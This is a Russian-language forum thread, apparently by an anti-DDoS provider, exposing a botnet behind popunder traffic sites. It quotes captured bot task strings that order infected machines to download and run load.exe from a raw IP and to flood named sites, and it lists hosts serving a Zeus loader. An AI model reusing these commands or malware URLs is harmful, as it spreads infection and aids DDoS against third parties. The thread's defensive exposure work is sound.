тссс...
ps. но тех кто через нас ходил они ддосить перестали 😂 т.к. попалим 100%
там с фантазией проблемы по ходу...
kostich добавил 19.04.2008 в 17:35
аха ха ха ха... маразм крепачал:
dload http://78.109.21.42/images2/load.exe rdttp 5 popunder.ru / rdttp 1 popsups.ru / rdttp 1 pop-parad.net / rdttp 3 www.account.pop-parad.net /reg.html rdttp 1 www.popbank.ru /
kostich добавил 19.04.2008 в 17:41
Флуд на www.account.pop-parad.net/reg.html адекватный ответ? 😂
а им какое до этого дело?
интересно, а у mypremium.ru персоналка у WM или нет?
креатив проявился на zadrotko.in
т.е. mypremium.ru покупал хостинг у него на его дедике?
PS. mypremium.ru и popups.ru жили вместе на том дедике где ща pop-master.cn :)
а auto-pro.org, intimchik.net, mypremium.ru тоже по ходу его?
Ну значится приехали.
Есть у нас в РУнете такой popups.ru, который с "ручками заточенными" переливает траф на pop-master.cn, который стоит на сервере 203.117.170.40... ну т.е. там где когда-то жил popups.ru. Шло время, _popups.ru/my/index.php пришлось куда-то выносить т.к. житья это людям не давало... выносить вынесли, а _203.117.170.40/~whyme/my/index.php пришлось оставить. Завернули это дело через http://atomakayan.biz/whyme/index.php и начали прогружать Zeus... обычный такой Zeus, который сегодня ничем не обнаруживается -> http://www.virustotal.com/ru/analisis/c72cc72841be321d4324e50b5ef9e6a5, который болтается на http://ftp4sales.cn/zeus/ldr.exe, который зареган на тоже лицо что и pop-master.cn
Помогите человеку пожалуйста... кто чем может... а там глядишь он и на путь истинный встанет.
popups.ru - 89.188.104.103
pop-master.cn - 203.117.170.40
ftp4sales.cn - 200.63.46.22
atomakayan.biz - 78.109.28.56
и ради этого надо заражать под 30 тыс компов в РУнете и заниматься ддос-ом?
ps. скажите мне плиз лучше кого в этом списке нет и кто со своей партнерки трафик на "загрузки" льет.
kostich добавил 19.04.2008 в 09:35
Кстати, а у владельцев popups.ru случаем кино проектов своих нет?
ну вот -> http://forum.nag.ru/forum/index.php?showtopic=42726
Т.к. мы вывалили http://stopddos.ru/current/ в массы, то к нашему желанию подчистить РУнетку от ботнеток подключились в т.ч. и провайдеры. В статистику попадает только то, что пользуется нашими решениями для защиты. Один из администраторов, который заметил свои ip-шки на StopDDOS, проанализировал трафик и выявил URL по которому ddos-боты получали команды. Ну а далее мы уже там руки приложили и получилось вот что:
wait 20 tid 4 dload http://78.109.21.42/images2/load.exe rdttp 2 popunder.ru / rdttp 1 kinotraff.ru / rdttp 1 loadfilm.ru / rdttp 1 popsups.ru / rdttp 1 pop-parad.net / rdttp 1 www.popbank.ru/ rdttp 2 pop-ip.ru /
Вот это передавалось ботам в качестве "задания". Объем сети не сказать что большой, но тем не менее для некоторых ДЦ может оказаться смертельным. Количество одновременно атакующих компьютеров давно уже перевалило за 10тыс.